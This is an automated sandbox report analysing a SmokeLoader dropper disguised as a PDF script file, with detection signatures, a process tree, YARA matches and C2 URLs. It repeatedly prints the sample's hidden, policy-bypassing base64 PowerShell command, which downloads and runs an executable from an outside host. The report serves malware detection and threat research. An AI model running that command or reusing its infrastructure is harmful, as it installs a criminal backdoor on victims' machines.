Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3312.PDF.wsf

Overview

General Information

Sample name:3312.PDF.wsf
renamed because original name is a hash value
Original sample name:_i_300924_i_30_09_2024___UA973248410000000026006263312.PDF.wsf
Analysis ID:1525803
MD5:701f5342e776f67438ee65a228b3d43d
SHA1:a6a64eafe7d80017411bb18e8873f4623343fa66
SHA256:19a2e0704d092bc44ba2802c45e6d845f6b912831c8a2b7f21d0b3d900408000
Tags:bestmagazineforanimalsunicum-ruwsfuser-JAMESWT_MHT
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 8084 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\3312.PDF.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2832 cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7248 cmdline: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA= MD5: 04029E121A0CFA5991749937DD22A1D9)
        • oBuf.exe (PID: 2180 cmdline: "C:\Users\user\AppData\Local\Temp\oBuf.exe" MD5: 31059E7394B880F017E83804D9B716AB)
          • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • wbfgshs (PID: 6024 cmdline: C:\Users\user\AppData\Roaming\wbfgshs MD5: 31059E7394B880F017E83804D9B716AB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.1937502143.00000000007ED000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x35f1:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.1659047327.000000000090D000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x36c9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x254:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000005.00000002.1658821304.00000000006B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 11 entries

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2832, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 7248, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2832, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 7248, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2832, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 7248, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2832, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 7248, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc 